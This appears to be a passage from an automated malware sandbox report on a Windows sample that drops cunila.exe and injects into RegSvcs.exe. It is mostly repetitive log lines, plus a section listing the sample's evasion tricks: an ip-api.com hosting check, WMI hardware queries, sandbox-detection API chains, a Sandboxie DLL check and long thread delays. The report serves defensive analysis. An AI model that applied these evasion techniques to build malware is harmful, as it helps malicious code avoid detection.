                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Found API chain indicative of sandbox detection
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                    Source: C:\Users\user\Desktop\SAL987656700.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97985
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeAPI/Special instruction interceptor: Address: 15CA02C
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeAPI/Special instruction interceptor: Address: 1327A54
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599866Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599211Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599100Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598983Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598872Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598032Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596835Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596717Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596511Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596404Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593831Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598983Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598764Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598317Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598091Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2663Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7159Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1466Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8386Jump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeAPI coverage: 3.4 %
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeAPI coverage: 3.6 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008BC2A2 FindFirstFileExW,0_2_008BC2A2
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F68EE FindFirstFileW,FindClose,0_2_008F68EE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_008F698F
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008ED076
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008ED3A9
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008F9642
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008F979D
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_008EDBBE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_008F9B2B
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_008F5C97
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0055C2A2 FindFirstFileExW,2_2_0055C2A2
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005968EE FindFirstFileW,FindClose,2_2_005968EE
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0059698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0059698F
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0058D076
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0058D3A9
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00599642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00599642
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0059979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0059979D
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00599B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00599B2B
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0058DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0058DBBE
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00595C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00595C97
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008842DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599866Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599211Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599100Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598983Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598872Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598032Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
